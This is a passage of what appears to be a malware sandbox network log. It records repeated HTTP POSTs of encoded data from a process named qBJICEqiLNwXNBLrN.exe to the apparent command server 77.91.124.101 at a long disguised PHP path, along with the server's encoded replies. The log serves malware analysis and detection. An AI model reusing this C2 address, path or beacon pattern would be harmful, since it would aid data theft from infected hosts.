Nov 21, 2023 04:48:03.547147036 CET	386	OUT	Data Raw: 57 5f 58 50 5e 5e 5f 5e 5d 57 55 57 55 5d 57 52 50 52 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XP^^_^]WUWU]WRPRXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')2(+>S>#$/2_4^<*V$2R0)-;>X?4/&G''^)+
Nov 21, 2023 04:48:03.755608082 CET	387	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	49769	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:03.347954988 CET	384	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:03.546896935 CET	384	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:03.547147036 CET	386	OUT	Data Raw: 57 5f 58 50 5e 5e 5f 5e 5d 57 55 57 55 5d 57 52 50 52 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XP^^_^]WUWU]WRPRXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')2(+>S>#$/2_4^<*V$2R0)-;>X?4/&G''^)+
Nov 21, 2023 04:48:03.755608082 CET	387	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	77.91.124.101	80	192.168.2.5	49770	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:04.080090046 CET	387	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:04.278098106 CET	388	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:04.278456926 CET	390	OUT	Data Raw: 57 58 5d 5a 5b 52 5a 5f 5d 57 55 57 55 5b 57 5a 50 53 58 44 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WX]Z[RZ_]WUWU[WZPSXDVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')81<.S* (/-7))\?9$[1&31.;:\+,;\,&G''^)3
Nov 21, 2023 04:48:04.481086016 CET	391	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.5	49770	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:04.080090046 CET	387	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:04.278098106 CET	388	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:04.278456926 CET	390	OUT	Data Raw: 57 58 5d 5a 5b 52 5a 5f 5d 57 55 57 55 5b 57 5a 50 53 58 44 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WX]Z[RZ_]WUWU[WZPSXDVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')81<.S* (/-7))\?9$[1&31.;:\+,;\,&G''^)3
Nov 21, 2023 04:48:04.481086016 CET	391	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	77.91.124.101	80	192.168.2.5	49771	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:04.800623894 CET	391	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:04.999392986 CET	392	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:04.999623060 CET	394	OUT	Data Raw: 57 50 5d 5d 5b 58 5f 5b 5d 57 55 57 55 5a 57 51 50 5b 58 42 56 55 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]][X_[]WUWUZWQP[XBVUWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(!+*S> #_/"":< 9&."'..<;Y;&G''^)7
Nov 21, 2023 04:48:05.205761909 CET	395	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.5	49771	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:04.800623894 CET	391	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:04.999392986 CET	392	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:04.999623060 CET	394	OUT	Data Raw: 57 50 5d 5d 5b 58 5f 5b 5d 57 55 57 55 5a 57 51 50 5b 58 42 56 55 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]][X_[]WUWUZWQP[XBVUWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(!+*S> #_/"":< 9&."'..<;Y;&G''^)7
Nov 21, 2023 04:48:05.205761909 CET	395	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	77.91.124.101	80	192.168.2.5	49772	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:05.520483971 CET	395	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:05.718169928 CET	396	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:05.718548059 CET	398	OUT	Data Raw: 57 5d 58 5c 5b 58 5f 59 5d 57 55 57 55 5b 57 54 50 53 58 41 56 5f 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X\[X_Y]WUWU[WTPSXAV_WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'6(>;6#*(#%&-.00).-+#,&G''^)3
Nov 21, 2023 04:48:05.921027899 CET	399	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.5	49772	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:05.520483971 CET	395	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:05.718169928 CET	396	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:05.718548059 CET	398	OUT	Data Raw: 57 5d 58 5c 5b 58 5f 59 5d 57 55 57 55 5b 57 54 50 53 58 41 56 5f 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X\[X_Y]WUWU[WTPSXAV_WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'6(>;6#*(#%&-.00).-+#,&G''^)3
Nov 21, 2023 04:48:05.921027899 CET	399	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.5	49773	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:05.950911999 CET	399	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:06.152107000 CET	400	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:06.152419090 CET	402	OUT	Data Raw: 57 50 5d 59 5b 52 5a 51 5d 57 55 57 55 5b 57 51 50 5c 58 42 56 53 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Y[RZQ]WUWU[WQP\XBVSWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'="<>V* ;"] :=X)#.Q$-"'0.W9+=?#Y->&G''^)3
Nov 21, 2023 04:48:06.358747005 CET	405	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 05 26 3f 05 02 37 33 37 55 2b 2a 31 51 2d 00 0f 18 28 20 31 13 26 3d 19 07 27 07 21 54 3f 11 2b 01 30 00 2c 56 23 50 30 59 29 30 21 5a 0c 1d 25 07 36 38 3b 52 2b 3e 0e 59 28 2d 0e 18 26 0f 2f 1a 3c 3d 20 0a 34 0a 3b 58 26 30 3b 0b 2f 59 31 59 2f 38 35 1b 27 3c 2d 07 34 17 23 5f 0c 14 24 0b 23 22 3f 5f 34 0e 07 0d 22 37 30 59 20 24 2b 56 27 2d 30 1c 32 06 2d 17 3c 06 28 1e 32 09 24 13 30 04 27 55 26 3a 33 56 3f 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !&?737U+1Q-( 1&='!T?+0,V#P0Y)0!Z%68;R+>Y(-&/<= 4;X&0;/Y1Y/85'<-4#_$#"?_4"70Y $+V'-02-<(2$0'U&:3V?:&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	77.91.124.101	80	192.168.2.5	49773	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:05.950911999 CET	399	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:06.152107000 CET	400	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:06.152419090 CET	402	OUT	Data Raw: 57 50 5d 59 5b 52 5a 51 5d 57 55 57 55 5b 57 51 50 5c 58 42 56 53 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Y[RZQ]WUWU[WQP\XBVSWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'="<>V* ;"] :=X)#.Q$-"'0.W9+=?#Y->&G''^)3
Nov 21, 2023 04:48:06.358747005 CET	405	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 05 26 3f 05 02 37 33 37 55 2b 2a 31 51 2d 00 0f 18 28 20 31 13 26 3d 19 07 27 07 21 54 3f 11 2b 01 30 00 2c 56 23 50 30 59 29 30 21 5a 0c 1d 25 07 36 38 3b 52 2b 3e 0e 59 28 2d 0e 18 26 0f 2f 1a 3c 3d 20 0a 34 0a 3b 58 26 30 3b 0b 2f 59 31 59 2f 38 35 1b 27 3c 2d 07 34 17 23 5f 0c 14 24 0b 23 22 3f 5f 34 0e 07 0d 22 37 30 59 20 24 2b 56 27 2d 30 1c 32 06 2d 17 3c 06 28 1e 32 09 24 13 30 04 27 55 26 3a 33 56 3f 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !&?737U+1Q-( 1&='!T?+0,V#P0Y)0!Z%68;R+>Y(-&/<= 4;X&0;/Y1Y/85'<-4#_$#"?_4"70Y $+V'-02-<(2$0'U&:3V?:&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	77.91.124.101	80	192.168.2.5	49718	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:30.299001932 CET	166	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:30.495738983 CET	167	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:30.495970964 CET	169	OUT	Data Raw: 57 5f 58 5f 5b 5e 5f 5a 5d 57 55 57 55 5e 57 5b 50 58 58 46 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_X_[^_Z]WUWU^W[PXXFVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+;V= 4/4#+%'$ *9+6<;;&G''^)
Nov 21, 2023 04:47:30.699763060 CET	170	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49718	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:30.299001932 CET	166	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:30.495738983 CET	167	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:30.495970964 CET	169	OUT	Data Raw: 57 5f 58 5f 5b 5e 5f 5a 5d 57 55 57 55 5e 57 5b 50 58 58 46 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_X_[^_Z]WUWU^W[PXXFVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+;V= 4/4#+%'$ *9+6<;;&G''^)
Nov 21, 2023 04:47:30.699763060 CET	170	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.5	49774	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:06.084899902 CET	400	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:06.281615973 CET	402	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:06.281907082 CET	404	OUT	Data Raw: 57 59 58 5a 5e 5e 5a 5e 5d 57 55 57 55 5a 57 5a 50 5d 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXZ^^Z^]WUWUZWZP]XHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8=<;0;/7Z7:+ ='%33"T-;">?(->&G''^)7
Nov 21, 2023 04:48:06.485061884 CET	405	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	77.91.124.101	80	192.168.2.5	49774	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:06.084899902 CET	400	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:06.281615973 CET	402	IN	HTTP/1.1 100 Continue
